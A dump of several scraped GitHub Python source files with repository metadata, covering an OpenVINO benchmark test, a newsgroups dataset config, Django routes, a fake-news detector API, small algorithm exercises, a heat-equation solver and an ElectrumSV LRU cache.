exe_suffix = \".exe\" if sys.platform == \"win32\" else \"\"\n benchmark_app = install_prefix / \"bin\" / f\"benchmark_app{exe_suffix}\"\n returncode, _ = cmd_exec(\n [str(benchmark_app), \"-d=CPU\", f\"-m={model}\", \"-niter=1\", \"-nireq=1\"],\n env=get_openvino_environment(install_prefix),\n )\n assert returncode == 0, f\"Command exited with non-zero status {returncode}\"\n","repo_name":"zhaohb/myopenvino","sub_path":"tests/conditional_compilation/test_infer.py","file_name":"test_infer.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1642978654","text":"### 20-Newsgroup data parameters ###\n\n### DATASET GENERATION PARAMETERS\npair = ['alt.atheism', 'soc.religion.christian']\nshorthand = 'ac'\nnf = 1000 # Number of words to use as features\n\nn_train = 1000 # total train points to generate\nn_test = 500 # total test points to generate\nn_trials = 1 # number of seeds to generate for\noverwrite = False # Overwrite existing trials\n\n# Load dataset-specific arguments (for train/test)\ndef parse_ds_args(args):\n\tparsed = {}\n\t#parsed['shorthand'] = args[0]\n\tparsed['pair'] = args[0]\n\tparsed['nf'] = int(args[1])\n\tparsed['n_trained'] = int(args[2])\n\treturn parsed\n\n# Load generation parameters (for generate_data)\ndef set_generation_params():\n\tparams = {}\n\tparams['pair'] = pair\n\tparams['shorthand'] = shorthand\n\tparams['n_f'] = nf\n\tparams['n_trained'] = n_train\n\tparams['n_test'] = n_test\n\tparams['seeds'] = [int(x) for x in range(n_trials)]\n\tparams['overwrite'] = overwrite\n\treturn params\n\n### DEFINE SAVE LOCATION AND FILES\ndirec = 'Datasets/Newsgroups/'\nimport string\nfile_template = string.Template(\"$pair-f$nf-train$n_trained-seed$seed\")\n#file_params = {'pair':shorthand, 'nf':nf, 'n_trained':n_train, 'seed':0}\nsave_template = string.Template(\"$shorthand-f$nf-train$n_train\")\n\n\n","repo_name":"akellyca/GraphicalEnsembleClassifier","sub_path":"config_newsgroups.py","file_name":"config_newsgroups.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39032684764","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('basket/', views.basket, name='basket'),\n path('form/', views.form, name='form'),\n path('order/', views.order, name='order'),\n path('product/', views.product, name='product'),\n path('routers/', views.routers, name='routers'),\n path('about/', views.about, name='about'),\n path('addProductToBascet/', views.addProductToBascet, name='addProductToBascet'),\n path('addCount/', views.addCountOrder, name='addCount'),\n path('minusCount/', views.minusCountOrder, name='minusCount'),\n path('minusCount/', views.minusCountOrder, name='minusCount'),\n path('category/', views.category_set, name='category'),\n path('search/', views.Search.as_view(), name='search'),\n path('product-data/', views.DetailPopap.as_view(), name='product-data'),\n path('catalog-data/', views.CatalogAPi.as_view(), name='catalog-data'),\n path('category-data/', views.CategoryAPi.as_view(), name='category-data'),\n path('in-basket/', views.in_basket, name='in-basket'),\n path('count-order/', views.count_order, name='count_order'),\n\n]\n","repo_name":"erllan/ROUTER","sub_path":"shop_router/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21112787147","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nimport IsFake.services as services\n\n\n# Train the model first thing when the server starts running\ncount_vect, tfidf_transformer, clf, articles = services.get_trained_machine()\n\n\nclass IsFake(APIView):\n \"\"\"\n The api endpoint for validating the received article.\n \"\"\"\n\n def get(self, request):\n\n params = request.query_params\n if len(params) != 1:\n return Response(\"Please enter a url to parse.\", status=status.HTTP_204_NO_CONTENT)\n else:\n url = params['article_url']\n article_title, article_content = services.parse_article(url)\n whole_content = article_title + '\\n' + article_content\n prediction, score = services.predict(count_vect, tfidf_transformer, clf, articles, whole_content)\n response = {\n 'article_title': article_title,\n 'article_content': article_content,\n 'prediction': prediction,\n 'confidence': score\n }\n\n return Response(response, status=status.HTTP_200_OK)\n","repo_name":"Gullumbroso/FakeNewsDetector","sub_path":"IsFake/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12717558125","text":"# // https://codeforces.com/problemset/problem/71/A\n\ndef function(word): # function to do work\n if len(word) > 0 and len(word) <= 10: # check the conditions now\n print(\"Not too long word.\\n\")\n elif len(word) <= 0: # word length less than equal to 0\n print(\"Invalid length.\\n\")\n else:\n print(\"The word is: \", word[0] + str(len(word) - 2) + word[len(word) -1])\n print(\"\\n\")\n\nn = int(input()) # take the number of words as input\nfor i in range(n): # for loop \n word = input()\n function(word)\n","repo_name":"Hammad1007/Code-Forces","sub_path":"800/Way too Long Words/wtl.py","file_name":"wtl.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73053321209","text":"class Topology:\n def __init__(self, n):\n self.matrix = []\n self.n = n\n\n def addlink(self, u, v, w):\n self.matrix.append((u, v, w))\n\n def table(self, dist, src):\n print(\"Vector Table of {}\".format(chr(ord('A')+src)))\n print(\"Dest\\tcost\")\n\n for i in range(self.n):\n print(\"{0}\\t{1}\".format(chr(ord('A')+i), dist[i]))\n\n def bellmanford(self, src):\n dist = [9999] * self.n\n dist[src] = 0\n\n for _ in range(self.n - 1):\n for u, v, w in self.matrix:\n if dist[u] != 9999 and dist[u] + w < dist[v]:\n dist[v] = dist[u] + w\n\n self.table(dist, src)\n\n\ndef main():\n matrix = []\n n = int(input(\"Enter number of Nodes : \"))\n print(\"Enter the Adjacency Matrix :\")\n for i in range(n):\n m = list(map(int, input().strip().split()))\n matrix.append(m)\n topo = Topology(n)\n for i in range(n):\n for j in range(n):\n if matrix[i][j] == 1:\n topo.addlink(i, j, 1)\n\n for a in range(n):\n topo.bellmanford(a)\n\n\nmain()\n","repo_name":"harshit3012/CN_Lab","sub_path":"Lab7 (23-11)/dist_vector.py","file_name":"dist_vector.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28419418882","text":"from scipy.sparse import diags\nfrom utils import Timer\nimport numpy as np\n\n\ndef init(dx, L, T):\n \"\"\"Create dt, Nx, and Nt from dx, L, and T.\"\"\"\n dt = 0.5 * dx ** 2 # stability condition\n\n Nx = int(round(L / dx, 10)) + 1\n Nt = int(round(T / dt, 10)) + 1\n\n return dx, dt, Nx, Nt\n\n\ndef tridiag(n, a, b, c):\n \"\"\"Create a tridiagonal nxn matrix with signature (a, b, c).\"\"\"\n k = [np.full(n-1, a), np.full(n, b), np.full(n-1, c)]\n return diags(k, [-1, 0, 1])\n\n\ndef heat_solver(dx, L, T, u0):\n \"\"\"Solve the heat equation using the forward Euler scheme.\"\"\"\n dx, dt, Nx, Nt = init(dx, L, T)\n\n u_grid = np.zeros((Nt, Nx))\n t_ray = np.zeros(Nt)\n\n assert u0[0] == u0[-1] == 0\n\n u_grid[0, :] = u0\n\n alpha = dt / (dx**2) # = 0.5\n A = tridiag(Nx-2, alpha, 1-2*alpha, alpha)\n if Nx < 90:\n # for small values of Nx, the dense matrix representation is faster\n A = A.toarray()\n\n for i in range(Nt-1):\n u_grid[i+1, 1:-1] = A.dot(u_grid[i, 1:-1])\n t_ray[i+1] = t_ray[i] + dt\n\n return t_ray, u_grid\n\n\ndef get_anasol(dx, T):\n \"\"\"Get analytical solution to the heat equation.\"\"\"\n def u(x, t):\n return np.exp(-np.pi**2 * t)*np.sin(np.pi * x)\n\n dx, _, Nx, Nt = init(dx, 1, T)\n\n x_ray = np.linspace(0, 1, Nx)\n t_ray = np.linspace(0, T, Nt)\n\n return u(*np.meshgrid(x_ray, t_ray))\n\n\ndef main():\n timer = Timer()\n T = np.log(100) / (np.pi**2)\n\n for dx in [1e-1, 1e-2]:\n print(f\"dx={dx}\")\n u0 = np.sin(np.pi*np.linspace(0, 1, int(1 / dx) + 1))\n u0[-1] = 0\n\n timer.restart()\n t_ray, u_num_grid = heat_solver(dx, 1, T, u0)\n print(f\" time: {timer.get_pretty()}\")\n\n u_ana_grid = get_anasol(dx, T)\n\n np.savez(\n f\"data/num_solver/dx={dx}.npz\", t_ray=t_ray,\n u_num_grid=u_num_grid, u_ana_grid=u_ana_grid\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Emilinya/FYS-STK4155","sub_path":"project3/src/num_solver.py","file_name":"num_solver.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31827960988","text":"def slimWindow(arr: list, size: int):\n if not arr or len(arr) None:\n \"\"\"\n The only node which can have an empty key or value is the root node. None of the added\n nodes will have empty links, keys or values.\n \"\"\"\n self.previous = previous if previous is not None else self\n self.next = next if next is not None else self\n self.key = key\n self.value = value\n self.value_size = value_size\n\n\n# Derived from functools.lrucache, LRUCache should be considered licensed under Python license.\n# This intentionally does not have a dictionary interface for now.\nclass LRUCache:\n def __init__(self, max_count: Optional[int]=None, max_size: Optional[int]=None) -> None:\n self._cache: Dict[bytes, Node] = {}\n\n assert max_count is not None or max_size is not None, \"need some limit\"\n if max_size is None:\n max_size = MAXIMUM_TXDATA_CACHE_SIZE_MB * (1024 * 1024)\n assert MINIMUM_TXDATA_CACHE_SIZE_MB * (1024 * 1024) <= max_size <= \\\n MAXIMUM_TXDATA_CACHE_SIZE_MB * (1024 * 1024), \\\n f\"maximum size {max_size} not within min/max constraints\"\n self._max_size = max_size\n self._max_count: int = max_count if max_count is not None else sys.maxsize\n self.current_size = 0\n\n self.hits = self.misses = 0\n self._lock = RLock()\n # This will be a node in a bi-directional circular linked list with itself as sole entry.\n self._root = Node()\n\n def set_maximum_size(self, maximum_size: int, resize: bool=True) -> None:\n self._max_size = maximum_size\n if resize:\n with self._lock:\n self._resize()\n\n def get_sizes(self) -> Tuple[int, int]:\n return (self.current_size, self._max_size)\n\n def _add(self, key: bytes, value: Transaction, size: int) -> Node:\n most_recent_node = self._root.previous\n new_node = Node(most_recent_node, self._root, key, value, size)\n most_recent_node.next = self._root.previous = self._cache[key] = new_node\n self.current_size += size\n return new_node\n\n def __len__(self) -> int:\n return len(self._cache)\n\n def __contains__(self, key: bytes) -> bool:\n return key in self._cache\n\n def set(self, key: bytes, value: Optional[Transaction]) -> Tuple[bool, List[Tuple[\n bytes, Transaction]]]:\n added = False\n removals: List[Tuple[bytes, Transaction]] = []\n with self._lock:\n node = self._cache.get(key, None)\n if node is not None:\n # This will either remove the entry if the value is `None` or reorder the entry\n # to be the most recent by removing and readding it (meaning it will get flushed\n # from the cache after less recent transactions if space is needed).\n previous_node, next_node, old_value = node.previous, node.next, node.value\n previous_node.next = next_node\n next_node.previous = previous_node\n self.current_size -= node.value_size\n del self._cache[key]\n removals.append((key, old_value))\n\n size = obj_size(value)\n if value is not None and size <= self._max_size:\n added_node = self._add(key, value, size)\n a, b, c, d = len(self._cache)-1, self._max_count, self.current_size, self._max_size\n resize_removals = self._resize()\n assert all(t[0] != added_node.key for t in resize_removals), \\\n f\"removed added node {a} {b} {c} {d}\"\n removals.extend(resize_removals)\n added = True\n\n return added, removals\n\n def get(self, key: bytes) -> Optional[Transaction]:\n with self._lock:\n node = self._cache.get(key)\n if node is not None:\n previous_node, next_node, value = node.previous, node.next, node.value\n previous_node.next = next_node\n next_node.previous = previous_node\n most_recent_node = self._root.previous\n most_recent_node.next = self._root.previous = node\n node.previous = most_recent_node\n node.next = self._root\n self.hits += 1\n return value\n self.misses += 1\n return None\n\n def _resize(self) -> List[Tuple[bytes, Transaction]]:\n removals = []\n # Discount the root node when considering count.\n while len(self._cache) > self._max_count or self.current_size > self._max_size:\n node = self._root.next\n previous_node, next_node, discard_key, discard_value = \\\n node.previous, node.next, node.key, node.value\n previous_node.next = next_node\n next_node.previous = previous_node\n self.current_size -= node.value_size\n del self._cache[discard_key]\n removals.append((discard_key, discard_value))\n return removals\n","repo_name":"electrumsv/electrumsv","sub_path":"electrumsv/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"77"}